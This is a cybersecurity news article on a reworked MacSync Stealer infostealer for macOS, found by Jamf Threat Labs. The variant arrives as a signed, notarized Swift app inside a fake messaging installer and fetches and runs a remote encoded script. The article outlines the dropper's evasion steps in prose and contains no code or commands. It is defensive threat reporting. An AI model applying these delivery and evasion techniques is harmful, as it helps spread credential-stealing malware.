A newly identified macOS malware sample that disguises itself as a legitimate, signed application has been uncovered during routine threat monitoring.
The malware, a reworked version of the MacSync Stealer, departs from earlier delivery methods and adopts a quieter, more automated installation process.
The sample was detected by Jamf Threat Labs while reviewing alerts triggered by internal YARA rules.
Technical Observations From Analysis
Unlike previous MacSync Stealer variants that relied on user interaction via ClickFix or Terminal-based tricks, this version arrives as a Swift application that is both code-signed and notarized by Apple. It is distributed inside a disk image posing as a messaging app installer and requires no command-line involvement.
Once launched, the application silently retrieves an encoded script from a remote server and executes it through a helper component. Jamf noted that similar techniques have recently appeared in other macOS infostealers, including newer versions of Odyssey.
Despite being signed, the installer still displayed instructions prompting users to right-click and select Open, a tactic commonly used to bypass Gatekeeper warnings.
Inspection confirmed the application was built as a universal Mach-O binary and signed under a developer certificate that, at the time of discovery, had not been revoked.
The disk image stood out for its unusually large size of 25.5MB, inflated with decoy files such as unrelated PDF documents.
Detection rates varied. Some samples uploaded to VirusTotal were flagged by only one security engine, while others were identified by up to thirteen. Most detections classified the files as generic downloaders.
Read more on macOS malware distribution: New FlexibleFerret Malware Chain Targets macOS With Go Backdoor
Jamf later reported the associated developer certificate to Apple, which has since revoked it.
How the Dropper Operates
The Swift-based dropper performs several checks before executing its payload, including:
-
Verifying internet connectivity before proceeding
-
Enforcing a minimum execution interval of around 3600 seconds
-
Downloading the payload using a modified curl command designed to avoid detection
-
Removing quarantine attributes and validating the file before execution
The malware runs largely in memory and cleans up temporary files after execution, leaving minimal traces behind. Its behavior mirrors previous MacSync Stealer campaigns once the second-stage payload is deployed.
“While MacSync Stealer itself is not entirely new, this case highlights how its authors continue to evolve their delivery methods,” Jamf Threat Labs said.
“This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications. By leveraging these techniques, adversaries reduce the chances of being detected early on.”
Image credit: Nanain / Shutterstock.com